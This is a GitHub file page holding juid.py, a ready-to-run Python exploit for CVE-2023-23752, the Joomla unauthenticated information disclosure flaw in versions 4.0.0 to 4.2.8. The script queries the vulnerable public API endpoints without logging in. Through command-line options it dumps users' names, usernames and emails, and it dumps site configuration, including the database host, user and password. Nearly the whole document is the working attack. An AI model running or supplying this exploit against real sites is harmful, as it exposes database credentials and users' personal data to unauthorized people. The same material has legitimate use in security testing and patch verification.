-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathjuid.py
127 lines (99 loc) · 2.83 KB
/
juid.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
"""
Joomla Unauthenticated Information Disclosure
CVE-2023-23752
Affected versions: 4.0.0 < 4.2.8
Github:
https://github.com/AlissonFaoli
Linkedin:
https://linkedin.com/alisson-faoli
"""
#!/usr/bin/python3
import json
import requests
import sys
HELP = f'''
Usage:
python3 {__file__} [option] URL
Example:
python3 {__file__} -a http://example.com
Options:
-u dump users
-U dump users in full JSON format
-c dump configs
-C dump configs in full JSON format
-a dump users and configs
-A dump users and configs in full JSON format
'''
def get_users():
vuln_url = '/api/index.php/v1/users?public=true'
full_url = url+vuln_url
return requests.get(full_url).json()
def get_configs():
vuln_url = '/api/index.php/v1/config/application?public=true'
full_url = url + vuln_url
return requests.get(full_url).json()
def pretty_json(json_data):
return json.dumps(json_data, indent=4, separators=(',', ':'))
def userinfo(info):
attribs = [i.get('attributes') for i in info.get('data')]
return '\n'.join([f'Name: {i.get("name")}\n\
ID: {i.get("id")}\n\
Username: {i.get("username")}\n\
Email: {i.get("email")}\n\
Register date: {i.get("registerDate")}\n\
Group name: {i.get("group_names")}\n\
Able to send e-mail: {"Yes" if i.get("sendEmail") else "No"}'
for i in attribs])
def configsinfo(info):
text = ''
data = [i.get("attributes")
for i in info.get('data') if i.get('type') == 'application']
for i in data:
match list(i.keys())[0]:
case 'db':
text += f'Database: {i.get("db")}\n'
case 'dbtype':
text += f'Database type: {i.get("dbtype")}\n'
case 'dbprefix':
text += f'Database prefix: {i.get("dbprefix")}\n'
case 'host':
text += f'Host: {i.get("host")}\n'
case 'user':
text += f'User: {i.get("user")}\n'
case 'password':
text += f'Password: {i.get("password")}\n'
case 'dbencryption':
text += f'Encryption: {i.get("dbencryption")}\n'
return text
if __name__ == '__main__':
try:
selection = sys.argv[1]
url = sys.argv[-1] if '/' != sys.argv[-1][-1] else sys.argv[-1][:-1]
url = 'http://' + url if not url.startswith('http') else url
match selection:
case '-u':
users = userinfo(get_users())
print(users)
case '-U':
users = pretty_json(get_users())
print(users)
case '-c':
configs = configsinfo(get_configs())
print(configs)
case '-C':
configs = pretty_json(get_configs())
print(configs)
case '-a':
users = userinfo(get_users())
configs = configsinfo(get_configs())
print('\n[USERS]')
print(users)
print('\n[CONFIGS]')
print(configs)
case '-A':
full = pretty_json({'users': get_users(), 'configs': get_configs()})
print(full)
case _:
print(HELP)
except:
print(HELP)